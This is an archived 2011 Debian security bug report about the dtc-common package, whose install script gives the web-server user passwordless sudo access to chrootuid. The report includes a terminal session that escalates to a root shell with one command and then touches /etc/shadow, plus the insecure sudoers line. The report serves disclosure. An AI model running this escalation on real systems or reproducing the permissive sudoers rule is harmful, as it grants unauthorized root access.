thr3ads.net - Secure testing team - [Secure-testing-team] Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root [Aug 2011]

If this information is useful, please help other people find it:
Share via:

Mike O''Connor

2011-Aug-13 04:56 UTC

[Secure-testing-team] Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root

Package: dtc-common
Severity: critical
Tags: security
Justification: root security hole


the install script gives sudo access to the dtc user (the user that is running
apache) unrestricted access to chrootuid, which essentially gives root access
to the dtc account:

root at testdtc:/var/lib/dtc/etc# su - dtc
$ whoami
dtc
$ sudo chrootuid / root /bin/bash
root at testdtc:/# whoami
root
root at testdtc:/# wc -l /etc/shadow
27 /etc/shadow
rot at testdtc:/# grep dtc /etc/sudoers
Defaults:dtc !set_logname
dtc      ALL= NOPASSWD: /usr/bin/chrootuid *

-- System Information:
Debian Release: wheezy/sid
  APT prefers unstable
  APT policy: (600, ''unstable''), (500,
''testing''), (1, ''experimental'')
Architecture: amd64 (x86_64)

Kernel: Linux 3.0.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Secure testing team - Aug 2011 - Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root

[Secure-testing-team] Bug#637618: dtc-common: giving sudo access to chrootuid is giving access to root